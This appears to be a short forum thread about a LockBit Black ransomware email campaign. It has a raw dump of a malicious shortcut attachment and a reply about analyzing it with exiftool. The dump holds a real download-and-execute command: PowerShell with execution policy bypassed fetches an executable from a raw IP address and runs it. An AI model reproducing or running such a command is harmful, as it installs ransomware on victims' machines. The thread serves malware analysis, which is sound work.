https://www.msspalert.com/news/lockbit-black-ransomware-campaign-spraying-millions-of-messages
The contents of the document in one email look like this:
cat Document/Document.doc.lnk L�F� r��tg��oH��}�a��tg���5P�O� �:i�+00�/C:\V1�[G�Windows@ ヌOwH$\L�.Y��:WindowsZ1$\jSystem32B ヌOwH$\��.U�WֲSystem32V2��X�� cmd.exe@ ᄊX��$\��.jg�4�cmd.exeJ-Im4/FC:\Windows\System32\cmd.exe!..\..\..\Windows\System32\cmd.exe�/c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://178.16.54.109/spl.exe','%userprofile%\windrv.exe');Start-Process '%userprofile%\windrv.exe' shell32.dll�%windir%\System32\cmd.exe%windir%\System32\cmd.exe�%� �wN��]N�D.��Q���`�Xdesktop-4mksc1r~N8��jEJ�s@d����u^Y��'� ~N8��jEJ�s@d����u^Y��'� � ��1SPS��XF�L8C���&�m�m-S-1-5-21-711635060-3631344071-1154681243-50091SPS�mD��pH�H@.�=x�hHN�!"0
iPaq•10h ago
Bummer, I would've loved to analyze this spl.exe encryptor and maybe also troll the attacker.
Also FYI, somehow, exiftool supports .lnk files so you can read the full command of the lnk cleanly with that.